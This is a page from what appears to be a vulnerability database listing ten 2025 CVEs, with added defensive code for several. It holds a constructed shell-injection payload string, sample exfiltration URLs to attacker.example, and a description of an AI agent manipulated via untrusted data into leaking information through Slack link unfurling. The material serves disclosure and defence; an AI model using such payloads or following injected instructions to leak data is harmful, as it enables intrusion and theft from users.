8.7

CVSS4.0

CVE-2025-49588 - Linkwarden Local File Inclusion Vulnerability

Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In version 2.10.2, the server accepts links of format file:///etc/passwd and doesn't do any validation before sending them to parsers and playwright, this can result in leak of other u…

📅 Published: July 2, 2025, 2:05 p.m. 🔄 Last Modified: April 15, 2026, 12:35 a.m.
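The defect described above is the absence of a scheme check before a user-supplied link reaches the parser and the headless browser. The following is an added example of the allow-list check a practitioner would expect at that point; it is illustrative code written for this listing, not Linkwarden's own implementation, and the function name `check_link` and its `(accepted, reason)` return shape are assumptions. It also covers variants a naive prefix check misses (leading whitespace, upper-case scheme, an empty host, embedded credentials).

```python
from urllib.parse import urlsplit

# Only these schemes are ever handed to the fetcher or parser; everything else is refused.
# An allow-list, not a deny-list: file:, data:, javascript:, ftp: etc. fail by default.
ALLOWED_SCHEMES = frozenset({"http", "https"})


def check_link(url: object) -> tuple[bool, str]:
    """Validate a user-submitted link before it reaches any parser or browser.

    Returns (accepted, reason). Hypothetical helper for this listing, not
    Linkwarden's code.
    """
    if not isinstance(url, str):
        return False, "not a string"
    candidate = url.strip()          # " file:///etc/passwd" must not slip past a prefix check
    parts = urlsplit(candidate)      # urlsplit lowercases the scheme, so "FILE:" is caught too
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme or '(none)'!r} not allowed"
    if not parts.hostname:
        return False, "missing host"  # "http:///etc/passwd" parses with an empty netloc
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    return True, "ok"
```

Because the decision is made on the parsed scheme rather than on a string prefix, the same check rejects `FILE:///etc/passwd`, ` file:///etc/passwd` and `file://localhost/etc/passwd` without a list of spellings to maintain.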

10

CVSS4.0

CVE-2025-34073 - stamparm/maltrail <=0.54 Remote Command Execution

An unauthenticated command injection vulnerability exists in stamparm/maltrail (Maltrail) versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. This occurs due to unsafe handling of user-supplied input…

📅 Published: July 2, 2025, 1:46 p.m. 🔄 Last Modified: April 15, 2026, 12:35 a.m.
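The bug class named above is untrusted input spliced into a shell command string. As an added example (constructed for this listing, not Maltrail's code), the vulnerable pattern is shown beside two hardened forms; `echo` stands in for the real log sink so the snippet runs offline, and `PAYLOAD` is a constructed value that demonstrates the breakout.

```python
import shlex
import subprocess


def log_failed_login_unsafe(username: str) -> str:
    """Vulnerable pattern: the username is pasted into a shell command string.

    Constructed to mirror the class of bug in the advisory; not Maltrail's code.
    """
    cmd = 'echo "failed login attempt for username \'%s\'"' % username
    return subprocess.check_output(cmd, shell=True, text=True)


def log_failed_login_safe(username: str) -> str:
    """Hardened: no shell at all. The message is a single argv element, so shell
    metacharacters in the username are plain data."""
    message = "failed login attempt for username '%s'" % username
    return subprocess.check_output(["echo", message], text=True)


def log_failed_login_quoted(username: str) -> str:
    """If a shell really is required, quote the untrusted value before splicing it."""
    message = "failed login attempt for username '%s'" % username
    return subprocess.check_output("echo " + shlex.quote(message), shell=True, text=True)


# Constructed payload: closes the double-quoted argument, runs a second command,
# then reopens the quote so the shell sees a syntactically valid line.
PAYLOAD = '"; echo INJECTED; echo "'
```

With `PAYLOAD` as the username, the unsafe version prints `INJECTED` on a line of its own (the second command ran), while both hardened versions print the username verbatim, quotes and semicolons included.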

9.3

CVSS4.0

CVE-2025-34072 - Anthropic Slack MCP Server Data Exfiltration via Link Unfurling

A data exfiltration vulnerability exists in Anthropic's deprecated Slack Model Context Protocol (MCP) Server via automatic link unfurling. When an AI agent using the Slack MCP Server processes untrusted data, it can be manipulated to generate messages containing attacker-crafted hyperlinks embeddin…

📅 Published: July 2, 2025, 1:46 p.m. 🔄 Last Modified: April 15, 2026, 12:35 a.m.
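The exfiltration channel above is a hyperlink the agent is talked into posting, which Slack then fetches when it unfurls the link. An egress check on the agent's outbound messages is the control a practitioner would want in front of such a server. The following is an added example of that check, written for this listing and not part of the MCP server; the function name, the host allow-list and the sample message are assumptions. A link is dropped when its host is not allow-listed or when any value from the agent's sensitive context appears in it, compared after percent-decoding.

```python
import re
from urllib.parse import unquote, urlsplit

# Matches bare URLs and the URL part of Slack's <url|label> form; stops at whitespace,
# the closing '>' or the '|' label separator.
URL_RE = re.compile(r"https?://[^\s<>|\"')\]]+")


def filter_outbound_links(message: str, allowed_hosts: set[str],
                          sensitive: list[str]) -> tuple[str, list[str]]:
    """Strip links an agent should not be allowed to post.

    Constructed egress check for this listing, not the MCP server's own code.
    Returns the cleaned message and the list of removed URLs so they can be logged.
    """
    removed: list[str] = []

    def replace(match) -> str:
        url = match.group(0)
        host = (urlsplit(url).hostname or "").lower()
        decoded = unquote(url)                      # "Q1%20revenue" must match "Q1 revenue"
        leaks = [s for s in sensitive if s and s in decoded]
        if host not in allowed_hosts or leaks:
            removed.append(url)
            return "[link removed]"
        return url

    return URL_RE.sub(replace, message), removed


# Constructed sample: one legitimate link and two that carry context data to an outside host.
SAMPLE_MESSAGE = (
    "Summary ready: https://docs.example.com/report and details at "
    "https://attacker.example/c?k=sk-test-ABC123 "
    "<https://attacker.example/x?d=Q1%20revenue%20down|click here>"
)
SAMPLE_SENSITIVE = ["sk-test-ABC123", "Q1 revenue down"]
```

Both tests are needed: the host allow-list catches links to unknown domains even when the payload is encoded in a way the secret scan misses, and the secret scan catches data smuggled through an allow-listed host's open redirect or search endpoint.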

9.4

CVSS4.0

CVE-2025-34071 - GFI Kerio Control Unsigned System Image Upload Root Code Execution

A remote code execution vulnerability in GFI Kerio Control 9.4.5 allows attackers with administrative access to upload and execute arbitrary code through the firmware upgrade feature. The system upgrade mechanism accepts unsigned .img files, which can be modified to include malicious scripts within…

📅 Published: July 2, 2025, 1:45 p.m. 🔄 Last Modified: Feb. 26, 2026, 6:28 p.m.

10

CVSS4.0

CVE-2025-34070 - GFI Kerio Control GFIAgent Missing Authentication on Administrative Interfaces

A missing authentication vulnerability in the GFIAgent component of GFI Kerio Control 9.4.5 allows unauthenticated remote attackers to perform privileged operations. The GFIAgent service, responsible for integration with GFI AppManager, exposes HTTP services on ports 7995 and 7996 without proper au…

📅 Published: July 2, 2025, 1:44 p.m. 🔄 Last Modified: Feb. 26, 2026, 6:28 p.m.

9.5

CVSS4.0

CVE-2025-34069 - GFI Kerio Control GFIAgent Authentication Bypass via Proxy Forwarding

An authentication bypass vulnerability exists in GFI Kerio Control 9.4.5 due to insecure default proxy configuration and weak access control in the GFIAgent service. The non-transparent proxy on TCP port 3128 can be used to forward unauthenticated requests to internal services such as GFIAgent, byp…

📅 Published: July 2, 2025, 1:44 p.m. 🔄 Last Modified: Nov. 19, 2025, 2:36 p.m.

10

CVSS4.0

CVE-2025-34067 - Hikvision Integrated Security Management Platform Remote Command Execution via applyCT Fastjson

An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an a…

📅 Published: July 2, 2025, 1:44 p.m. 🔄 Last Modified: April 15, 2026, 12:35 a.m.

8.7

CVSS4.0

CVE-2025-34057 - Ruijie NBR Router Administrative Credential Disclosure

An information disclosure vulnerability exists in Ruijie NBR series routers (known to affect NBR2000G, NBR1300G, and NBR1000 models) via the /WEB_VMS/LEVEL15/ endpoint. By crafting a specific POST request with modified Cookie headers and specially formatted parameters, an unauthenticated attacker c…

📅 Published: July 2, 2025, 1:43 p.m. 🔄 Last Modified: April 15, 2026, 12:35 a.m.

4.9

CVSS3.1

CVE-2025-27026 - Improper Access Control Granularity impacting Infinera G42

A missing double-check feature in the WebGUI for CLI deactivation in Infinera G42 version R6.1.3 allows an authenticated administrator to make other management interfaces unavailable via local and network interfaces. The CLI deactivation via the WebGUI does not only stop the CLI interface but deactiv…

📅 Published: July 2, 2025, 1:42 p.m. 🔄 Last Modified: Feb. 11, 2026, 9:20 p.m.

8.8

CVSS4.0

CVE-2025-53106 - Graylog vulnerable to privilege escalation through API tokens

Graylog is a free and open log management platform. In versions 6.2.0 to before 6.2.4 and 6.3.0-alpha.1 to before 6.3.0-rc.2, Graylog users can gain elevated privileges by creating and using API tokens for the local Administrator or any other user for whom the malicious user knows the ID. For the a…

📅 Published: July 2, 2025, 1:28 p.m. 🔄 Last Modified: Oct. 30, 2025, 3:45 p.m.
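The escalation above works because the token-creation endpoint checks that the caller is authenticated but not whether the caller is allowed to act for the target user; the token then authenticates as its owner, so the privileges follow the owner, not the creator. The following added example shows that authorization gap and its fix in a minimal token store. It is illustrative Python written for this listing, not Graylog's (Java) code; the `User`, `TokenStore`, `whoami` and `demo` names and the sample user IDs are assumptions.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class User:
    id: str
    name: str
    is_admin: bool = False


@dataclass
class TokenStore:
    # token value -> id of the user the token authenticates as
    tokens: Dict[str, str] = field(default_factory=dict)


def create_token_vulnerable(store: TokenStore, caller: User, target_user_id: str) -> str:
    """Checks only that *someone* is logged in, so any user can mint a token that
    authenticates as any user ID they know, including the local administrator."""
    token = secrets.token_urlsafe(32)
    store.tokens[token] = target_user_id
    return token


def create_token_fixed(store: TokenStore, caller: User, target_user_id: str) -> str:
    """Authorization is decided on the *target*: a caller may only mint tokens
    for their own account unless they are an administrator."""
    if target_user_id != caller.id and not caller.is_admin:
        raise PermissionError(f"user {caller.id} may not create tokens for {target_user_id}")
    token = secrets.token_urlsafe(32)
    store.tokens[token] = target_user_id
    return token


def whoami(store: TokenStore, users: Dict[str, User], token: str) -> Optional[User]:
    """Resolve a bearer token to the user it acts as. Privileges come from that
    user, not from whoever created the token, which is why creation must be gated."""
    user_id = store.tokens.get(token)
    return users.get(user_id) if user_id else None


def demo() -> bool:
    """True when the fixed path blocks the escalation the vulnerable path allows."""
    admin = User("admin-id", "Administrator", is_admin=True)      # constructed sample users
    mallory = User("user-7", "mallory")
    users = {admin.id: admin, mallory.id: mallory}
    store = TokenStore()

    stolen = create_token_vulnerable(store, mallory, admin.id)    # low-privilege caller, admin target
    escalated = whoami(store, users, stolen).is_admin              # token now acts as the administrator

    try:
        create_token_fixed(store, mallory, admin.id)
        blocked = False
    except PermissionError:
        blocked = True
    return escalated and blocked
```

The same rule applies to listing, revoking or rotating tokens: every operation that names a target user must be authorized against that target, not merely against the presence of a session.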
Total results: 345149
Page 4414 of 34,515